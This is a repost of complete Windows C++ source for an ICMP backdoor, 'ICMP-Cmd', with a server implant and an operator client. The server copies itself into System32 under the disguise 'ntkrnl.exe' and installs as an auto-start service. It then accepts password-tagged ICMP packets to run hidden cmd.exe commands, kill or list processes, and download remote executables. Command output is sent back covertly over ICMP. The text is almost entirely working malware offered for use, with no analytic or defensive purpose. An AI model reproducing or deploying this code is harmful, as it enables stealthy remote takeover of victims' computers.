vc++ ICMP后门后门程序

server.cpp

#include <winsock2.h>#include <stdio.h>#include <urlmon.h> #include <tlhelp32.h>#pragma comment(lib, "Urlmon.lib")#pragma comment(lib, "ws2_32.lib")#define ICMP_PASSWORD 1234                                             #define STATUS_FAILED 0xFFFF#define MAX_PACKET 6500#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))/* The IP header */typedef struct iphdr {unsigned int h_len:4; //4位首部长度unsigned int version:4; //IP版本号，4表示IPV4unsigned char tos; //8位服务类型TOSunsigned short total_len; //16位总长度（字节）unsigned short ident; //16位标识unsigned short frag_and_flags; //3位标志位unsigned char ttl; //8位生存时间 TTLunsigned char proto; //8位协议 (TCP, UDP 或其他)unsigned short checksum; //16位IP首部校验和unsigned int sourceIP; //32位源IP地址unsigned int destIP; //32位目的IP地址}IpHeader;//定义ICMP首部typedef struct _ihdr {BYTE i_type; //8位类型BYTE i_code; //8位代码USHORT i_cksum; //16位校验和 USHORT i_id; //识别号（一般用进程号作为识别号）USHORT i_seq; //报文序列号 ULONG timestamp; //时间戳}IcmpHeader;char arg[256];char buffer[2048] = {0};//管道输出的数据void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数void fill_icmp_data(char * icmp_data);void pslist(void);BOOL killps(DWORD id);//杀进程函数void send(void);char *ICMP_DEST_IP;USHORT checksum(USHORT *buffer, int size);HANDLE                hMutex;SERVICE_STATUS        ServiceStatus;SERVICE_STATUS_HANDLE ServiceStatusHandle;void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);void  WINAPI CmdControl(DWORD);DWORD WINAPI CmdService(LPVOID);void  InstallCmdService(void);void  RemoveCmdService(void);void  usage(char *par);int main(int argc,char *argv[]){SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};if(argc==2){if(!stricmp(argv[1],"-install")){//usage(argv[0]);InstallCmdService();printf("InstallCmdService\n");}else if(!stricmp(argv[1],"-remove")){//usage(argv[0]);RemoveCmdService();printf("RemoveCmdService\n");}else usage(argv[0]);return 0;}else usage(argv[0]);StartServiceCtrlDispatcher(DispatchTable);return 0;}void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv){HANDLE    hThread;ServiceStatus.dwServiceType             = SERVICE_WIN32;ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;ServiceStatus.dwServiceSpecificExitCode = 0;ServiceStatus.dwWin32ExitCode           = 0;ServiceStatus.dwCheckPoint              = 0;ServiceStatus.dwWaitHint                = 0;ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);if(ServiceStatusHandle==0){OutputDebugString("RegisterServiceCtrlHandler Error !\n");return ;}ServiceStatus.dwCurrentState = SERVICE_RUNNING;ServiceStatus.dwCheckPoint   = 0;ServiceStatus.dwWaitHint     = 0;if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0){OutputDebugString("SetServiceStatus in CmdStart Error !\n");return ;}hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);if(hThread==NULL){OutputDebugString("CreateThread in CmdStart Error !\n");}return ;}void WINAPI CmdControl(DWORD dwCode){switch(dwCode){case SERVICE_CONTROL_PAUSE:ServiceStatus.dwCurrentState = SERVICE_PAUSED;break;case SERVICE_CONTROL_CONTINUE:ServiceStatus.dwCurrentState = SERVICE_RUNNING;break;case SERVICE_CONTROL_STOP:      WaitForSingleObject(hMutex,INFINITE);ServiceStatus.dwCurrentState  = SERVICE_STOPPED;ServiceStatus.dwWin32ExitCode = 0;ServiceStatus.dwCheckPoint    = 0;ServiceStatus.dwWaitHint      = 0;if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0){OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");}ReleaseMutex(hMutex);CloseHandle(hMutex);return ;case SERVICE_CONTROL_INTERROGATE:break;default:break;}if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0){OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");}return ;}DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数，把你的代码写在这里就可以成为服务{   char *icmp_data;int bread,datasize,retval;SOCKET sockRaw = (SOCKET)NULL;WSADATA wsaData;struct sockaddr_in dest,from;int fromlen = sizeof(from);int timeout = 2000;char *recvbuf;if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0){printf("WSAStartup failed: %s\n",retval);ExitProcess(STATUS_FAILED);}sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);if (sockRaw == INVALID_SOCKET){printf("WSASocket() failed: %s\n",WSAGetLastError());ExitProcess(STATUS_FAILED);}__try{bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));if(bread == SOCKET_ERROR) __leave;memset(&dest,0,sizeof(dest));dest.sin_family = AF_INET;datasize=0;datasize += sizeof(IcmpHeader); icmp_data =(char*)xmalloc(MAX_PACKET);recvbuf = (char*)xmalloc(MAX_PACKET);if (!icmp_data) {//fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());__leave;}memset(icmp_data,0,MAX_PACKET);for(;;) {int bwrote;bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);if (bread == SOCKET_ERROR){if (WSAGetLastError() == WSAETIMEDOUT)continue;__leave;}decode_resp(recvbuf,bread,&from);Sleep(200);memset(recvbuf,0,sizeof(recvbuf));}}__finally {if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);WSACleanup();}return 0;}void InstallCmdService(void){SC_HANDLE        schSCManager;SC_HANDLE        schService;char             lpCurrentPath[MAX_PATH];char             lpImagePath[MAX_PATH];char             *lpHostName;WIN32_FIND_DATA  FileData;HANDLE           hSearch;DWORD            dwErrorCode;SERVICE_STATUS   InstallServiceStatus;GetSystemDirectory(lpImagePath,MAX_PATH);strcat(lpImagePath,"\\ntkrnl.exe");lpHostName=NULL;printf("Transmitting File ... ");hSearch=FindFirstFile(lpImagePath,&FileData);if(hSearch==INVALID_HANDLE_VALUE){GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) {dwErrorCode=GetLastError();if(dwErrorCode==5){printf("Failure ... Access is Denied !\n");         }else{printf("Failure !\n");}return ;}else{printf("Success !\n");}}else{printf("already Exists !\n");FindClose(hSearch);}schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);if(schSCManager==NULL){printf("Open Service Control Manager Database Failure !\n");return ;}printf("Creating Service .... ");schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); if(schService==NULL){dwErrorCode=GetLastError();if(dwErrorCode!=ERROR_SERVICE_EXISTS){printf("Failure !\n");CloseServiceHandle(schSCManager);return ;}else{printf("already Exists !\n");schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);if(schService==NULL){printf("Opening Service .... Failure !\n");CloseServiceHandle(schSCManager);return ;}}}else{printf("Success !\n");}printf("Starting Service .... ");if(StartService(schService,0,NULL)==0)                         {dwErrorCode=GetLastError();if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING){printf("already Running !\n");CloseServiceHandle(schSCManager);  CloseServiceHandle(schService);return ;}}else{printf("Pending ... ");}while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)           {if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING){Sleep(100);}else{break;}}if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING){printf("Failure !\n");                       }else{printf("Success !\n");}CloseServiceHandle(schSCManager);CloseServiceHandle(schService);return ;}void RemoveCmdService(void) {SC_HANDLE        schSCManager;SC_HANDLE        schService;char             lpImagePath[MAX_PATH];char             *lpHostName;WIN32_FIND_DATA  FileData;SERVICE_STATUS   RemoveServiceStatus;HANDLE           hSearch;DWORD            dwErrorCode;GetSystemDirectory(lpImagePath,MAX_PATH);strcat(lpImagePath,"\\ntkrnl.exe");lpHostName=NULL;schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);if(schSCManager==NULL){printf("Opening SCM ......... ");dwErrorCode=GetLastError();if(dwErrorCode!=5){printf("Failure !\n"); }else{printf("Failuer ... Access is Denied !\n");}return ;}schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);if(schService==NULL) {printf("Opening Service ..... ");dwErrorCode=GetLastError();if(dwErrorCode==1060){printf("no Exists !\n");}else{printf("Failure !\n");}CloseServiceHandle(schSCManager);}else{printf("Stopping Service .... ");if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0){if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED){printf("already Stopped !\n"); }else{printf("Pending ... ");if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0){while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         {Sleep(10);QueryServiceStatus(schService,&RemoveServiceStatus);}if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED){printf("Success !\n");}else{printf("Failure !\n");}}else{printf("Failure !\n");          }}}else{printf("Query Failure !\n");}printf("Removing Service .... ");     if(DeleteService(schService)==0){printf("Failure !\n");   }else{printf("Success !\n");}}CloseServiceHandle(schSCManager);        CloseServiceHandle(schService);printf("Removing File ....... ");Sleep(1500);hSearch=FindFirstFile(lpImagePath,&FileData);if(hSearch==INVALID_HANDLE_VALUE){printf("no Exists !\n");}else{if(DeleteFile(lpImagePath)==0){printf("Failure !\n");               }else{printf("Success !\n");}FindClose(hSearch);}return ;}void decode_resp(char *buf, int bytes,struct sockaddr_in *from) {IpHeader *iphdr;IcmpHeader *icmphdr;unsigned short iphdrlen;iphdr = (IpHeader *)buf;iphdrlen = iphdr->h_len * 4 ; icmphdr = (IcmpHeader*)(buf + iphdrlen);if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段{ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址memcpy(arg,buf+iphdrlen+12,256);if (!memcmp(arg,"pskill",6)){killps(atoi(strstr(arg," ")));memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));send();}else if (!memcmp(arg,"pslist",6)){pslist();send();}else if (!strcmp(arg,"remove\n")){RemoveCmdService();memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));send();return;}////////////************    http下载   *************else if (!memcmp(arg,"http://",7))   {if(char *FileName=strstr(arg,"-")){char url[200];//保存网址的数组memset(url,0,200);memcpy(url,arg,int(FileName-arg-1));char fname[MAX_PATH];GetSystemDirectory(fname,MAX_PATH);FileName++;strcat(fname,"//");strcat(fname,FileName);*strstr(fname,"\n")=NULL;HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);memset(buffer,0,sizeof(buffer));if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n"));else memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));send();return;}}//*******************************************else{SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出HANDLE hRead,hWrite;sa.nLength = sizeof(SECURITY_ATTRIBUTES);sa.lpSecurityDescriptor = NULL;sa.bInheritHandle = TRUE;if (!CreatePipe(&hRead,&hWrite,&sa,0)) {printf("Error On CreatePipe()");return;}STARTUPINFO si;PROCESS_INFORMATION pi; si.cb = sizeof(STARTUPINFO);GetStartupInfo(&si); si.hStdError = hWrite;si.hStdOutput = hWrite;si.wShowWindow = SW_HIDE;si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;char cmdline[270];GetSystemDirectory(cmdline,MAX_PATH+1);strcat(cmdline,"//cmd.exe /c");strcat(cmdline,arg);if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) {printf("Error on CreateProcess()");return;}CloseHandle(hWrite);DWORD bytesRead;for(;;){if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;Sleep(200);}//printf("%s",buffer);///////////////////////////////////////////////发送输出数据send();}////////////////////////////////////////////////}//else printf("Other ICMP Packets!\n");//printf(endl; }USHORT checksum(USHORT *buffer, int size) {unsigned long cksum=0;while(size >1) {cksum+=*buffer++;size -=sizeof(USHORT);}if(size ) {cksum += *(UCHAR*)buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >>16);return (USHORT)(~cksum);}void fill_icmp_data(char * icmp_data){IcmpHeader *icmp_hdr;char *datapart;icmp_hdr = (IcmpHeader*)icmp_data;icmp_hdr->i_type = 0;icmp_hdr->i_code = 0;icmp_hdr->i_id = (USHORT) GetCurrentProcessId();icmp_hdr->i_cksum = 0;icmp_hdr->i_seq =4321;icmp_hdr->timestamp = GetTickCount(); //设置时间戳datapart = icmp_data + sizeof(IcmpHeader);memcpy(datapart,buffer,strlen(buffer));//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; }void  usage(char *par){printf("\t\t=====Welcome to www.hackerxfiles.net======\n");printf("\n");printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");printf("\t\t---[ E-mail: gxisone@hotmail.com      ]---\n");printf("\t\t---[                        2003/8/15 ]---\n");printf("\n");printf("\t\tUsage: %s -install (to install service)\n",par);printf("\t\t       %s -remove (to remove service)\n",par);printf("\n");return ;}void send(void){WSADATA wsaData;SOCKET sockRaw = (SOCKET)NULL;struct sockaddr_in dest;int bread,datasize,retval,bwrote;int timeout = 1000;char *icmp_data;if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET) ExitProcess(STATUS_FAILED);__try{if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;//设置发送超时memset(&dest,0,sizeof(dest));dest.sin_family = AF_INET;dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);datasize=strlen(buffer);datasize+=sizeof(IcmpHeader); icmp_data=(char*)xmalloc(MAX_PACKET);if(!icmp_data) __leave;memset(icmp_data,0,MAX_PACKET);fill_icmp_data(icmp_data); //填充ICMP报文((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文if (bwrote == SOCKET_ERROR){//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");//printf("sendto failed:"<<WSAGetLastError()<<endl;__leave;}//printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;}__finally {if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);WSACleanup();}memset(buffer,0,sizeof(buffer));Sleep(200);}void pslist(void){HANDLE hProcessSnap = NULL;PROCESSENTRY32 pe32= {0};hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProcessSnap == (HANDLE)-1){printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());return ;}pe32.dwSize = sizeof(PROCESSENTRY32);printf("\nProcessName　　　　 ProcessID");if (Process32First(hProcessSnap, &pe32)){char a[5];do{strcat(buffer,pe32.szExeFile);strcat(buffer,"\t\t");itoa(pe32.th32ProcessID,a,10);strcat(buffer,a);strcat(buffer,"\n");//printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);}while (Process32Next(hProcessSnap, &pe32));}else{printf("\nProcess32Firstt() failed:%d",GetLastError());}CloseHandle (hProcessSnap);return;}BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限{TOKEN_PRIVILEGES tp;LUID luid;if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)){printf("\nLookupPrivilegeValue error:%d", GetLastError() ); return FALSE; }tp.PrivilegeCount = 1;tp.Privileges[0].Luid = luid;if (bEnablePrivilege)tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;elsetp.Privileges[0].Attributes = 0;// Enable the privilege or disable all privileges.AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL); // Call GetLastError to determine whether the function succeeded.if (GetLastError() != ERROR_SUCCESS) { printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); return FALSE; } return TRUE;}////////////////////////////////////////////////////////////////////////////BOOL killps(DWORD id)//杀进程函数{HANDLE hProcess=NULL,hProcessToken=NULL;BOOL IsKilled=FALSE,bRet=FALSE;__try{if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken)){printf("\nOpen Current Process Token failed:%d",GetLastError());__leave;}//printf("\nOpen Current Process Token ok!");if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE)){__leave;}printf("\nSetPrivilege ok!");if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL){printf("\nOpen Process %d failed:%d",id,GetLastError());__leave;}//printf("\nOpen Process %d ok!",id);if(!TerminateProcess(hProcess,1)){printf("\nTerminateProcess failed:%d",GetLastError());__leave;}IsKilled=TRUE;}__finally{if(hProcessToken!=NULL) CloseHandle(hProcessToken);if(hProcess!=NULL) CloseHandle(hProcess);}return(IsKilled);}

client.cpp

#include <winsock2.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib,"ws2_32.lib")char SendMsg[256];/* The IP header */typedef struct iphdr {unsigned int h_len:4; //4位首部长度unsigned int version:4; //IP版本号，4表示IPV4unsigned char tos; //8位服务类型TOSunsigned short total_len; //16位总长度（字节）unsigned short ident; //16位标识unsigned short frag_and_flags; //3位标志位unsigned char ttl; //8位生存时间 TTLunsigned char proto; //8位协议 (TCP, UDP 或其他)unsigned short checksum; //16位IP首部校验和unsigned int sourceIP; //32位源IP地址unsigned int destIP; //32位目的IP地址}IpHeader;typedef struct _ihdr{BYTE i_type;//8位类型BYTE i_code; //8位代码USHORT i_cksum;//16位校验和USHORT i_id;//识别号（一般用进程号作为识别号）USHORT i_seq;//报文序列号ULONG timestamp;//时间截} IcmpHeader;#define STATUS_FAILED 0xFFFF#define MAX_PACKET 2000char arg[1450];#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))void fill_icmp_data(char *, int);USHORT checksum(USHORT *, int);void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数void help(void);void usage(char * prog);int main(int argc, char *argv[]){char *ICMP_DEST_IP; //目标主机的IPchar *recvbuf;if(argc!=2){usage(argv[0]);return 0;}ICMP_DEST_IP=argv[1];//取得目标主机IPWSADATA wsaData;SOCKET sockRaw;struct sockaddr_in dest,from;int datasize;int fromlen=sizeof(from);char *icmp_data;if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0){fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());ExitProcess(STATUS_FAILED);}sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);int timeout=1000;setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));timeout=4000;setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));memset(&dest,0,sizeof(dest));dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);dest.sin_family=AF_INET;usage(argv[0]);__try{for(;;){printf("ICMP-CMD>");fgets(SendMsg,1024,stdin);//取得命令行，保存在SendMsg数组中if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);if(!strcmp(SendMsg,"\n"))continue;if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}if(!memcmp(SendMsg,"http://",7))if(!strstr(SendMsg,"-")){printf("\nFileName Error. Use ");continue;}datasize=strlen(SendMsg);datasize+=sizeof(IcmpHeader);printf("ICMP packet size is %d",datasize);icmp_data= (char*)xmalloc(MAX_PACKET);recvbuf= (char *)xmalloc(MAX_PACKET);memset(icmp_data,0, MAX_PACKET);fill_icmp_data(icmp_data, datasize);((IcmpHeader *)icmp_data)->i_cksum=0;((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));if (bwrote == SOCKET_ERROR){if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());}if (bwrote<datasize ) {//没有把所有的数据发送出去，也出错了。return 0;}printf("\nSend Packet to %s Success!\n",argv[1]);DWORD start = GetTickCount();for(;;){if((GetTickCount() - start) >= 1000) break;memset(recvbuf,0,MAX_PACKET);int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);if(bread == SOCKET_ERROR){if(WSAGetLastError() == WSAETIMEDOUT){printf("timed out\n");break;}fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());break;}decode_resp(recvbuf, bread, &from);}}//end for}//end try__finally{if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);WSACleanup();}return 0;}USHORT checksum(USHORT *buffer, int size){unsigned long cksum=0;while(size > 1){cksum+=*buffer++;size-=sizeof(USHORT);}if(size){cksum+=*(UCHAR *)buffer;}cksum=(cksum >> 16) + (cksum & 0xffff);cksum+=(cksum >> 16);return(USHORT) (~cksum);}void fill_icmp_data(char *icmp_data, int datasize){IcmpHeader *icmp_hdr;char *datapart;icmp_hdr= (IcmpHeader *)icmp_data;icmp_hdr->i_type=0;icmp_hdr->i_code=0;icmp_hdr->i_id=(USHORT)GetCurrentProcessId();icmp_hdr->timestamp =GetTickCount();icmp_hdr->i_seq=1234;datapart=icmp_data + sizeof(IcmpHeader);memcpy(datapart,SendMsg,sizeof(SendMsg));}void usage(char * prog){printf("\t\t=====Welcome to www.hackerxfiles.net======\n");printf("\n");printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");printf("\t\t---[ E-mail:    gxisone@hotmail.com   ]---\n");printf("\t\t---[                      2003/8/15   ]---\n");printf("\t\tusage: %s RemoteIP\n",prog);printf("\t\tCtrl+C or Q/q to Quite        H/h for help\n");}void decode_resp(char *buf, int bytes,struct sockaddr_in *from) {memset(arg,0,sizeof(arg));IpHeader *iphdr;IcmpHeader *icmphdr;unsigned short iphdrlen;iphdr = (IpHeader *)buf;iphdrlen = iphdr->h_len * 4 ; icmphdr = (IcmpHeader*)(buf + iphdrlen);if(icmphdr->i_seq==4321)//密码正确则输出数据段{printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));printf(" IcmpType %d",icmphdr->i_type);printf(" IcmpCode %d",icmphdr->i_code);printf("\n");memcpy(arg,buf+iphdrlen+12,1450);printf("%s",arg);}else printf("Other ICMP Packets!\n");}void help(void){printf("\n");printf("[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is ////system32)\n");printf("[pslist]        (List the Process)\n");printf("[pskill ID]     (Kill the Process)\n");printf("Command         (run the command)\n"); printf("\n");}

http://blog.csdn.net/itcastcpp/article/details/4034302